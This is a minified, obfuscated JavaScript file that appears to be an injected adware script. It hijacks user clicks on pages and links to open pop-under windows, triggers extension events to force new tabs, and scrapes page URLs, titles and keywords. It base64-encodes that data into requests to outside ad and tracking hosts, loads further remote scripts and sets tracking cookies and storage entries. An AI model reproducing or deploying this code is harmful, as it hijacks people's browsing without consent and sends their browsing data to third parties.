_GPL.j(function(l,b,Q,A,h,d,p,ma,na,M,Ma,t,Na,ca,N,oa,n,pa,R,qa,u,q,ra,B,r,Oa,da){function S(){sa(f,R,S);Pa(function(a,c){e=a;T||(T=!0,Qa(),ea(),ta(f,R,ea),ua=ca(function(){36E5<+new h-va&&U(!1)},5E3))})}function ea(){va=+new h}function U(a){T&&(T=!1,Q(ua),fa=!1,l(V).children().add("body,a").add(n).off(W,wa),sa(f,R,ea),a||ta(f,R,S))}function ta(a,c,k){if(n[pa])a[pa](c,k,!1);else a.attachEvent("on"+c,k)}function Qa(){fa=!0;l(V).children().add("body,a").add(n).on(W,wa);if(H)try{b.log("Attempting to pop from extension to: "+
e);var a="ld893_"+(C?"_"+d(C)+"_":"")+"_"+v(),c=b.proto+b.baseCDN+"/pwn.html?u="+d(e)+"&n="+a+"&r=";"h"==H?(ga(f,"createNewTab",{url:c,focused:"true"}),ga(f.documentElement,"createNewTab",{url:c,focused:"true"})):"w"==H&&ga(n,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"});var k=ca(function(){f.documentElement.getAttribute("z7b85_91c4")&&(Q(k),U(!0),xa(),f.documentElement.removeAttribute("z7b85_91c4"))},100)}catch(ya){}}function ga(a,c,k){if(f.createEvent){var b=f.createEvent("CustomEvent");
b.initCustomEvent(c,!1,!1,k);a.dispatchEvent(b)}else b=f.createEventObject(),b.detail=k,b.realType=c,a.fireEvent("ondataavailable",b)}function O(a){a=Ma.userAgent.match(Na(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function Ra(a){if(e!=za){a=a.target||a.srcElement;for(var c="";a;){E||(E=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){c=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}c&&(e+="&t="+d(c.substring(0,Math.max(0,1500-e.length))));e+="&rt="+
(+new h-Aa);E&&(e+="&data_tag="+d(E));"/"!=p.pathname&&(e+="&mk="+d(b.B64.encode(ha().substring(0,Math.max(0,1500-e.length)))))}b.log("Popping to: "+e);c="ld893_"+(C?"_"+d(C)+"_":"")+"_"+v();a="yahoo.com"==b.gd();var c=b.proto+b.baseCDN+"/pwn.html?u="+d(e)+"&n="+c+"&r=",k=n.open(a?p.href:c,"_blank");k&&a&&(k.location.href=c);return k}function ha(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];l("title").length&&(c=c.concat(a(l("title").text())));l('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var b=
l.trim(l(this).attr("content"));b&&b.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(b)))});return l.trim(function(a){var c=[];l.each(a,function(a,b){-1==l.inArray(b,c)&&c.push(b)});return c}(c).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Ca(){var a=p.href.substr(0,1500),c="/"!=p.pathname?ha():"",a=a.replace(/:/g,"%3A"),c=c.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),k=b.getSubId?"&subid="+b.getSubId("z7b85"):"",a=d(b.B64.encode(a+"::z-"+w+"-"+Da+"::"+c));return b.proto+
Ea+"/pops?c="+a+"&a=1&ch="+d(P)+k}function sa(a,c,b){if(n[qa])a[qa](c,b,!1);else a.detachEvent("on"+c,b)}function Sa(a){a=a||n.event||{};if("keydown"!=a.type&&(1<a.which||0<a.button)||H&&f.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}function I(a,c){a=t(a,10);isNaN(a)&&(a=t(X&&X.getItem(c)||b.gc(c,10),10)||0);return a}function Y(){x|=0;g|=0;F|=0;var a=v(),c=g&&(new h(1E3*x)).getDate()!=(new h(1E3*a)).getDate();c&&
(g=0,m.set(r,g));var b=!G||a-x>=J&&g<G,a=a-F>=y;return!s&&c||b&&a}function wa(a){if(!Sa(a)){var c=fa&&Ta();K=c&&Ra(a);if(c&&"mousedown"==a.type&&Fa)try{a.target.click()}catch(k){}K&&!K.closed?(U(!0),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popsuccess&u="+d(e)+"&cid="+b.vars.cid+"&pid="+w+"&r="+999999999*Math.random(),Z&&A(Z),aa&&A(aa),Ua(K,1E3,xa)):K&&K.closed?aa||(aa=N(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+d(e)+"&location="+d(p.hostname)+"&pid="+w+"&tag="+
d(E||"")+"&r="+999999999*Math.random()},1E3)):c&&(Z||(Z=N(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+d(e)+"&location="+d(p.hostname)+"&pid="+w+"&tag="+d(E||"")+"&r="+999999999*Math.random()},1E3)))}}function Ua(a,c,b){var ya=+new h,Ba=ca(function(){var f=+new h-ya;if(f>=c)return Q(Ba),b();try{if(!a||a.closed||!1!==a.closed)Q(Ba),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popwinclosed_new&u="+d(e)+"&location="+d(p.hostname)+"&pid="+w+"&tag="+d(E||"")+"&delay="+
f+"&r="+999999999*Math.random()}catch(g){}},200)}function Ta(){if(!m.swf)return!0;x=I(m.get(u),u);316808>Ga.score&&(g=I(m.get(r),r));var a=Ha(m.get(q));F=I(a[L],q);return Y()}function v(){return ma(new h/1E3)}function Ia(a,c,b){m.set(a,b);b=v();X&&X.setItem(a,b);c=t(c,10);var d=new h;d.setSeconds(d.getSeconds()+c);f.cookie=a+"="+b+";expires="+d.toUTCString()+";path=/;domain="+L}function xa(){var a=v();Ia(u,J,a);m.set(Oa,a);x=a;m.set(r,++g);y&&Ia(q,y,ba+(ba&&",")+L+":"+a)}function Ha(a){var b={},d=
v(),e=[];a=(a||"").split(",");if(a.length){for(var f=0;f<a.length;++f){var g=a[f].split(":"),h=t(g[1],10);d-h<y&&(b[g[0]]=h,e.push(g[0]+":"+h))}ba=e.join(",");m.set(q,ba)}return b}function ia(){return Y()||s?1:v()-(t(F,10)||0)<y?Infinity:g>=G?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function Va(a){"US"==b.vars.cid?ja(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?
ja(a,59858,88620):ja(a,49928,59858);return Y()}function ja(a,b,d){a>=b&&(J=0,a>=d&&g>=G&&(g=na(0,G-1)))}function Ja(){A(ka);if(!s&&1735!=w){var a=ia(),c="http://clkmon.com/adServe/banners?pid=14442&cid="+Da+"&action=r&q=",f="/"!=p.pathname?ha():"",c=c+d(f.substring(0,Math.max(0,1500-c.length)));b.items.z7b85.callback({url:c,score:a});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&u="+d(p.hostname)+"&r="+999999999*Math.random()}}function Pa(a){b.items.z7b85={callback:function(b){Wa(b,
a)}};!function k(){b.gc(ra)||m.get(["frt","_GPL_oo_z7b85",u,q,r,da],function(a){if(a.v.frt){if("1750"==w){var d=t(a.v._GPL_oo_z7b85,10)||0;if(86400>ma(new h/1E3)-d)return}b.vars.types&&b.vars.types.length&&-1<b.vars.types.indexOf("c")?H="h":V.getAttribute("data-openThatTabBitch")&&(d="20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_tw".split(" "),z=a.v[da],z&&-1!=d.indexOf(z)||(z=d[Math.floor(Math.random()*d.length)],m.set(da,z)),
"20141007_tw"==z&&(H="w"));d=v();x=I(a.v[u],u);g=I(a.v[r],r);a=Ha(a.v[q]);F=I(a[L],q);if(Y()){a=ia();var e=f.createElement("script");e.src=Ca()+"&ms="+a+"&r="+d;e.onerror=Ja;V.appendChild(e);ka=N(Ja,15E3)}else a=ia(),b.log("minScoreNeeded: "+a),Infinity>a&&!Ka&&!s&&(b.insertJS(Ca()+"&ms="+a+"&r="+d),Ka=!0),A(la),la=N(k,1E3*(5+na(d,x+J,F+y)-d))}})}()}function Wa(a,c){A(ka);C="";if(a){a.cid&&(C=a.cid,a.url||(a.url=b.proto+Ea+"/click?c="+d(C)+(b.getSubId?"&subid="+b.getSubId("z7b85"):"")+(z?"&data_test="+
d(z):"")));s&&!a.cid&&(a.url=za,a.cid="xr");var e=t(a.score,10);if(s||0<e&&Va(e))Aa=+new h,A(la),a.url&&a.expires&&(A(La),La=N(function(){U(!0);S()},1E3*t(a.expires,10))),Ga={score:e,now:new h/1},c(a.url,e)}}var m=b.items.e6a00,f=n.document,V=f.body,X=n.localStorage,Fa=O("chrome");M=O("firefox");O("opera");oa=O("safari");var P=b.item_vars["22555_ch"]||b.item_vars.ch||"",J,x,F;B=(B=b.dt())&&B.inherited&&B.inherited.t||[];var s="x"==P||-1<B.indexOf("adult")||0==B.length&&0<l('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;
s&&(-1==B.indexOf("adult_block")?P="x":(P="x-issue",s=!1));var y,Ea="p.display-trk.com",T=!1,ua,va,fa=!1,L=b.gd(),e,K,Aa=0,La,ba="",g=0,G,Ga={},C="",la,Ka=!1,z,Z,aa,ka,E,W="click";if(Fa||oa)W="mousedown";else if(M||f.all||O("trident"))W="mouseup";M=b.zoneid("z7b85",!0).split("_");var Da=M[0],w=M[1]||b.vars.pid,za="http://secure.xsrving.com/display?size=800x600&ch="+d(P)+"&referer="+d(L),H=!1;b.canLoad("ld893")||b.gc(ra)||(n.name||"").match(/^a652c_/)||1797==w&&"GB"==b.vars.cid||"facebook.com"==L||
(s?(G=J=0,y=180,u+="_xr",q+="_xr",r+="_xr"):(J=360,G=4,y=360),S())},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","z7b85_bl1","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
